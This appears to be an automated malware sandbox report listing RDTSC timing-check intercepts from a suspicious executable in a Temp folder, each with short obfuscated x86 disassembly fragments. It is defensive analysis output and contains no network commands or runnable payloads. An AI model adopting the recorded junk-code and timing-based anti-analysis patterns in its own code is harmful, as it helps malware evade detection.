Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D08C3 second address: 54D08F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F58F53CD38Eh 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F58F53CD38Ch 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov cx, di 0x0000001a mov bx, F52Ch 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D08F2 second address: 54D08F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D08F8 second address: 54D08FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C071D second address: 54C0741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 call 00007F58F4C2897Bh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 mov ebx, 0C572094h 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0741 second address: 54C0788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ch, 5Eh 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F58F53CD396h 0x00000017 adc al, FFFFFFA8h 0x0000001a jmp 00007F58F53CD38Bh 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5460899 second address: 54608A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0C56 second address: 54C0C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0C67 second address: 54C0C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0C78 second address: 54C0CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F58F53CD38Eh 0x00000011 mov ebp, esp 0x00000013 jmp 00007F58F53CD390h 0x00000018 push dword ptr [ebp+0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0CB9 second address: 54C0CD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0CD6 second address: 54C0D0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F53CD398h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0D0A second address: 54C0D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0D10 second address: 54C0D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54C0D16 second address: 54C0D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC510F second address: CC5118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC5118 second address: CC513C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC513C second address: CC5142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC550A second address: CC5514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CC5514 second address: CC5518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: B1337C second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1EC5h], ecx 0x00000010 push dword ptr [ebp+122D0091h] 0x00000016 pushad 0x00000017 mov dword ptr [ebp+122D21D6h], esi 0x0000001d mov eax, dword ptr [ebp+122D2B53h] 0x00000023 popad 0x00000024 call dword ptr [ebp+122D1EFEh] 0x0000002a pushad 0x0000002b mov dword ptr [ebp+122D260Eh], edi 0x00000031 xor eax, eax 0x00000033 stc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D260Eh], eax 0x0000003e mov dword ptr [ebp+122D2DBBh], eax 0x00000044 cmc 0x00000045 mov esi, 0000003Ch 0x0000004a mov dword ptr [ebp+122D260Eh], esi 0x00000050 mov dword ptr [ebp+122D260Eh], esi 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007F58F53CD396h 0x0000005f lodsw 0x00000061 cmc 0x00000062 mov dword ptr [ebp+122D28BBh], ecx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c jmp 00007F58F53CD397h 0x00000071 jmp 00007F58F53CD398h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a clc 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f je 00007F58F53CD386h 0x00000085 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C91B9F second address: C91BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F58F4C28976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C8193F second address: C81962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Eh 0x00000007 jo 00007F58F53CD38Ch 0x0000000d jnc 00007F58F53CD386h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B27 second address: C90B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F58F4C28976h 0x0000000a jc 00007F58F4C28976h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90B39 second address: C90B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F58F53CD396h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90E45 second address: C90E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD38Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C90E55 second address: C90E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 je 00007F58F4C28976h 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C913E3 second address: C91401 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD395h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C943B3 second address: B12C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 28085C14h 0x0000000e mov dword ptr [ebp+1244EC87h], ecx 0x00000014 mov edx, 1DD02C11h 0x00000019 push dword ptr [ebp+122D0091h] 0x0000001f stc 0x00000020 call dword ptr [ebp+122D1EFEh] 0x00000026 pushad 0x00000027 mov dword ptr [ebp+122D260Eh], edi 0x0000002d xor eax, eax 0x0000002f stc 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 mov dword ptr [ebp+122D260Eh], eax 0x0000003a mov dword ptr [ebp+122D2DBBh], eax 0x00000040 cmc 0x00000041 mov esi, 0000003Ch 0x00000046 mov dword ptr [ebp+122D260Eh], esi 0x0000004c mov dword ptr [ebp+122D260Eh], esi 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 jmp 00007F58F4C28986h 0x0000005b lodsw 0x0000005d cmc 0x0000005e mov dword ptr [ebp+122D28BBh], ecx 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007F58F4C28987h 0x0000006d jmp 00007F58F4C28988h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 clc 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b je 00007F58F4C28976h 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94499 second address: C944EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F58F53CD38Ah 0x0000000d push edi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F58F53CD398h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007F58F53CD393h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944EF second address: C944F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C944FF second address: C94539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c xor edi, dword ptr [ebp+122D2B63h] 0x00000012 lea ebx, dword ptr [ebp+12455317h] 0x00000018 sub cx, E73Ah 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F58F4C28983h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C9465E second address: C946D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F58F53CD386h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d sub cl, FFFFFFACh 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F58F53CD388h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c add esi, 20CAB300h 0x00000032 push 00000000h 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F58F53CD388h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 mov dx, si 0x00000053 cmc 0x00000054 push 8901C812h 0x00000059 js 00007F58F53CD394h 0x0000005f push eax 0x00000060 push edx 0x00000061 push esi 0x00000062 pop esi 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C946D0 second address: C9470B instructions: 0x00000000 rdtsc 0x00000002 je 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 4901C812h 0x00000011 mov edi, 04D91295h 0x00000016 lea ebx, dword ptr [ebp+12455320h] 0x0000001c adc di, EF02h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push esi 0x00000026 pop esi 0x00000027 jmp 00007F58F4C28983h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C94710 second address: C94721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnc 00007F58F4C2897Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CA5264 second address: CA528A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F4C2897Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F58F4C2897Dh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C84F18 second address: C84F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD399h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: C84F37 second address: C84F41 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F58F4C28976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: CB326C second address: CB3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F58F53CD386h 0x00000011 jl 00007F58F53CD386h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0457 second address: 54A047D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F58F4C28984h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A047D second address: 54A0483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0483 second address: 54A04BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F58F4C2897Eh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F58F4C28987h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A04BF second address: 54A04C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A04C5 second address: 54A0576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F58F4C2897Ch 0x00000010 or ax, 1788h 0x00000015 jmp 00007F58F4C2897Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F58F4C28988h 0x00000021 and cx, F9E8h 0x00000026 jmp 00007F58F4C2897Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, esi 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F58F4C28984h 0x00000035 jmp 00007F58F4C28985h 0x0000003a popfd 0x0000003b call 00007F58F4C28980h 0x00000040 mov ah, 5Dh 0x00000042 pop edi 0x00000043 popad 0x00000044 xchg eax, edi 0x00000045 jmp 00007F58F4C2897Ah 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F58F4C2897Dh 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0576 second address: 54A057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A057C second address: 54A05AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F58F4C2897Ah 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F58F4C28989h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05AD second address: 54A05C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05C2 second address: 54A05D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C2897Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05D2 second address: 54A05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05D6 second address: 54A05F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov edx, 71FA1710h 0x00000011 mov dh, 94h 0x00000013 popad 0x00000014 mov dword ptr [esp+24h], 00000000h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov dh, ah 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A05F7 second address: 54A0650 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ax, 84B1h 0x0000000b popad 0x0000000c lock bts dword ptr [edi], 00000000h 0x00000011 jmp 00007F58F53CD38Ch 0x00000016 jc 00007F5967C2F1A5h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov cx, bx 0x00000022 pushfd 0x00000023 jmp 00007F58F53CD399h 0x00000028 and cl, FFFFFFA6h 0x0000002b jmp 00007F58F53CD391h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0008 second address: 54A0025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0025 second address: 54A005A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F58F53CD38Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F58F53CD38Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A005A second address: 54A00CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C28981h 0x00000009 or al, 00000056h 0x0000000c jmp 00007F58F4C28981h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F58F4C28980h 0x00000018 adc si, 4B78h 0x0000001d jmp 00007F58F4C2897Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 jmp 00007F58F4C28986h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushad 0x00000032 popad 0x00000033 movsx ebx, si 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A00CB second address: 54A00DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD390h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A00DF second address: 54A01F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F58F4C28984h 0x00000013 sbb ecx, 68E32A98h 0x00000019 jmp 00007F58F4C2897Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F58F4C28988h 0x00000025 and ah, FFFFFFF8h 0x00000028 jmp 00007F58F4C2897Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007F58F4C28989h 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F58F4C2897Ch 0x0000003d jmp 00007F58F4C28985h 0x00000042 popfd 0x00000043 movzx esi, bx 0x00000046 popad 0x00000047 push esi 0x00000048 jmp 00007F58F4C28988h 0x0000004d mov dword ptr [esp], esi 0x00000050 pushad 0x00000051 movzx ecx, bx 0x00000054 pushfd 0x00000055 jmp 00007F58F4C28983h 0x0000005a xor esi, 0563B8DEh 0x00000060 jmp 00007F58F4C28989h 0x00000065 popfd 0x00000066 popad 0x00000067 mov esi, dword ptr [ebp+08h] 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F58F4C28988h 0x00000073 rdtsc
